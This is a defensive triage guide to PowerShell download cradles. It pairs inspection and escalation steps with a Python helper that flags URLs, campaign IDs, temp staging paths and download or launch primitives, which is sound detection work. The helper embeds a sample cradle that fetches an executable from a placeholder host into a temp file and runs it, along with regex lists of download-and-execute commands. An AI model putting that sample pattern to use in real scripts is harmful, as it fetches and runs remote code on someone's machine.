PowerShell download cradle
A download cradle is a script pattern that retrieves remote content and prepares or executes it locally. In first-pass triage, the main job is understanding the chain before deciding whether to escalate.
What to inspect
- Remote indicators: Capture URLs, domains, and any hard-coded tokens or campaign IDs.
- Local staging path: Identify where the payload is written and whether it uses random file names in temp paths.
- Execution step: Confirm whether the script only downloads content or also launches it.
Next actions
- Containment: Block the domain or URL if policy allows and the activity is confirmed malicious.
- Preservation: Collect script text, IOC list, and host telemetry before cleanup removes evidence.
- Escalation: If the script executes a dropped binary, escalate to sandboxing or malware analysis workflows.
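The three inspection points above and the escalation rule under "Next actions" can be turned into a first-pass triage helper that runs over captured script text. This is an added example, not part of the original note: the sample cradle, its placeholder domain (`updates.example.invalid`) and campaign ID are constructed, and the regex lists are a starting set of common download and launch primitives, not an exhaustive signature.

```python
import re
from dataclasses import dataclass

# Constructed sample of a download-and-execute cradle; the domain and ID are placeholders, not real IOCs.
SAMPLE_SCRIPT = r"""
$u = 'http://updates.example.invalid/agent?cid=CAMP-7781'
$p = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName() + '.exe')
Invoke-WebRequest -Uri $u -OutFile $p
Start-Process -FilePath $p
"""

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
TOKEN_RE = re.compile(r"[?&]([A-Za-z_]\w*=[^&\s'\"]+)")  # query parameters that may carry campaign IDs
# Staging hints: temp/appdata paths and random file-name generation (assumed starting set).
STAGING_RE = re.compile(r"\$env:TEMP|\$env:APPDATA|\\Temp\\|GetTempPath\(\)|GetRandomFileName\(\)", re.I)
# Download primitives and launch primitives (assumed starting set, extend to local telemetry).
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item|&\s*\$", re.I)


@dataclass
class Triage:
    urls: list        # remote indicators to capture
    tokens: list      # hard-coded query tokens / campaign IDs found in those URLs
    staging: list     # local staging hints (temp paths, random names)
    downloads: bool   # a download primitive is present
    executes: bool    # a launch primitive is present

    def next_action(self) -> str:
        """Map the findings onto the note's escalation rule."""
        if not self.downloads:
            return "no download primitive found: review manually"
        if self.executes:
            return "escalate: downloads and executes; sandbox the dropped payload"
        return "download-only: block remote indicators if confirmed, preserve script"


def triage(script: str) -> Triage:
    """Extract remote indicators, staging hints and the download/execute steps from script text."""
    urls = list(dict.fromkeys(URL_RE.findall(script)))          # dedupe, keep first-seen order
    tokens = [t for u in urls for t in TOKEN_RE.findall(u)]
    staging = list(dict.fromkeys(STAGING_RE.findall(script)))
    return Triage(urls, tokens, staging,
                  bool(DOWNLOAD_RE.search(script)), bool(EXEC_RE.search(script)))


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print(result)
    print(result.next_action())
```

The output of `triage()` is the IOC list and chain summary the "Preservation" step asks for; a download-only result still warrants capturing the URLs, while a download-and-execute result is the escalation trigger.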